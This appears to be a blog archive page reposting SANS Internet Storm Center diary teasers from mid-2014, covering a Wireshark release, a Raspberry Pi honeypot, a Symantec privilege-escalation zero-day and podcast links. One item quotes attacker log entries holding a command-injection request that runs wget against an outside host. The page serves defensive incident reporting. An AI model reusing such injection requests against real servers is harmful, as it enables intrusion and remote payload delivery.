Twitter
LinkedIn
RSS

Archive for the ‘SANS Internet Storm Center’ Category


ISC StormCast for Friday, August 1st 2014 http://isc.sans.edu/podcastdetail.html?id=4087, (Fri, Aug 1st)

(c) SANS Internet Storm Center.

Read More...

WireShark 1.10.9 and 1.12.0 has been released, (Fri, Aug 1st)

Chris Mohan — Internet Storm Center Handler on Duty (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Read More...

A Honeypot for home: Raspberry Pi, (Thu, Jul 31st)

In numerous previous Diaries, my fellow Internet Storm Center Handlers have talk on honeypots, the values of full packet capture and value of sharing any attack data.

Read More...

ISC StormCast for Thursday, July 31st 2014 http://isc.sans.edu/podcastdetail.html?id=4085, (Thu, Jul 31st)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Read More...

Symantec Endpoint Protection Privilege Escalation Zero Day, (Wed, Jul 30th)

The people at Offensive Security have announced that in the course of a penetration test for one of their customers they have found several vulnerabilities in the Symantec Endpoint Protection product. While details are limited, the vulnerabilities appear to permit privilege escalation to the SYSTEM user which would give virtually unimpeded access to the system.  Offensive Security has posted a video showing the exploitation of one of the vulnerabilities .

Read More...

ISC StormCast for Wednesday, July 30th 2014 http://isc.sans.edu/podcastdetail.html?id=4083, (Wed, Jul 30th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Read More...

ISC StormCast for Tuesday, July 29th 2014 http://isc.sans.edu/podcastdetail.html?id=4081, (Tue, Jul 29th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Read More...

Interesting HTTP User Agent "chroot-apach0day", (Mon, Jul 28th)

Our reader Robin submitted the following detect: I’ve got a site that was scanned this morning by a tool that left these entries in the logs: [HTTP_USER_AGENT] => chroot-apach0day [HTTP_REFERRER] => /xA/x0a/x05 [REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget http://proxypipe.com/apach0day   The URL that appears to be retrieved does not exist, even though the domain does. In our own web logs, we have seen a couple of similar requests: 162.253.66.77 – - [28/Jul/2014:05:07:15 +0000] “GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0″ 301 178 “-” “chroot-apach0day” “-” 162.253.66.77 – - [28/Jul/2014:18:48:36 +0000] “GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0″ 301 178 “-” “chroot-apach0day” “-” 162.253.66.77 – - [28/Jul/2014:20:04:07 +0000] “GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0″ 301 178 “-” “chroot-apach0day-HIDDEN BINDSHELL-ESTAB” “-” If anybody has any ideas what tool causes these entries, please let us know. Right now, it doesn’t look like this is indeed an “Apache 0 Day”  There are a couple other security related sites where users point out this user agent string, with little insight as to what causes the activity or what the goal is.

Read More...

ISC StormCast for Monday, July 28th 2014 http://isc.sans.edu/podcastdetail.html?id=4079, (Mon, Jul 28th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Read More...

Management and Control of Mobile Device Security, (Mon, Jul 28th)

When we talk about mobile devices, all boundaries are gone. Depending where you work, it is likely that your mobile device (phone or tablet) has access to all the corporate data via wireless, in some case with very little restrictions

Read More...